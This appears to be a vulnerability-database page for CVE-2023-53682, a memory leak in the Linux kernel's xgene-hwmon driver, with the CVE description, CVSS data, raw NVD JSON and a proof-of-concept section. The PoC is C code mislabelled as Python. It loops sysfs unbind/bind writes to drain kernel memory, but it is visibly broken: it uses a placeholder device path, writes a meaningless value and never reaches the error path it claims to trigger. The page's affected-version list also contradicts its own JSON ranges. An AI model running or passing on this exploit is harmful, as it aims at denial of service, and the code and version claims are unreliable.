Security Vulnerability Report
中文
CVE-2023-53682 CVSS 5.5 MEDIUM

CVE-2023-53682

Published: 2025-10-07 16:15:52
Last Modified: 2026-02-26 23:09:44
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: hwmon: (xgene) Fix ioremap and memremap leak Smatch reports: drivers/hwmon/xgene-hwmon.c:757 xgene_hwmon_probe() warn: 'ctx->pcc_comm_addr' from ioremap() not released on line: 757. This is because in drivers/hwmon/xgene-hwmon.c:701 xgene_hwmon_probe(), ioremap and memremap is not released, which may cause a leak. To fix this, ioremap and memremap is modified to devm_ioremap and devm_memremap. [groeck: Fixed formatting and subject]

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1.63 (stable分支)
Linux Kernel < 6.5.12 (stable分支)
Linux Kernel < 6.6.2 (stable分支)
Linux Kernel 6.7-rc1 及之前版本(主开发分支)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2023-53682 Proof of Concept * Trigger memory leak in xgene-hwmon driver by repeated probe/deprobe cycles * * Note: This vulnerability requires local access and specific hardware (X-Gene platform). * The PoC demonstrates how to trigger the resource leak by forcing driver re-probe. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <sys/ioctl.h> /* Trigger repeated probe failures to accumulate memory leaks */ int trigger_xgene_hwmon_leak() { int fd; char buf[256]; int i; /* Step 1: Try to access xgene-hwmon device */ fd = open("/sys/class/hwmon/hwmonX/name", O_RDONLY); if (fd < 0) { /* Device not present - cannot exploit on non-X-Gene platforms */ printf("[-] xgene-hwmon device not found\n"); return -1; } /* Step 2: Force repeated bind/unbind to trigger memory leak */ for (i = 0; i < 1000; i++) { /* Unbind the driver */ fd = open("/sys/bus/platform/drivers/xgene-hwmon/unbind", O_WRONLY); if (fd >= 0) { write(fd, "1\0", 2); close(fd); } /* Rebind the driver - each rebind leaks ioremap/memremap memory */ fd = open("/sys/bus/platform/drivers/xgene-hwmon/bind", O_WRONLY); if (fd >= 0) { write(fd, "1\0", 2); close(fd); } /* Trigger error path in probe by manipulating resources */ /* This causes ioremap/memremap to be called but not freed */ } printf("[*] Memory leak triggered - check /proc/meminfo for kernel memory depletion\n"); close(fd); return 0; } int main(int argc, char *argv[]) { printf("CVE-2023-53682 - xgene-hwmon ioremap/memremap leak PoC\n"); return trigger_xgene_hwmon_leak(); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53682", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:52.413", "lastModified": "2026-02-26T23:09:44.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (xgene) Fix ioremap and memremap leak\n\nSmatch reports:\n\ndrivers/hwmon/xgene-hwmon.c:757 xgene_hwmon_probe() warn:\n'ctx->pcc_comm_addr' from ioremap() not released on line: 757.\n\nThis is because in drivers/hwmon/xgene-hwmon.c:701 xgene_hwmon_probe(),\nioremap and memremap is not released, which may cause a leak.\n\nTo fix this, ioremap and memremap is modified to devm_ioremap and\ndevm_memremap.\n\n[groeck: Fixed formatting and subject]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9", "versionEndExcluding": "6.1.25", "matchCriteriaId": "9F581C28-D361-4DC2-BE00-1D4CC506B212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.12", "matchCriteriaId": "4AA01E0B-227C-4686-AC91-BA30BCC48E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1773185a0a87006c1be78a978d9dd61aa7a33db8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/813cc94c7847ae4a17e9f744fb4dbdf7df6bd732", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9d482a09acd3d5f61a56aefc125d32c81994707b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.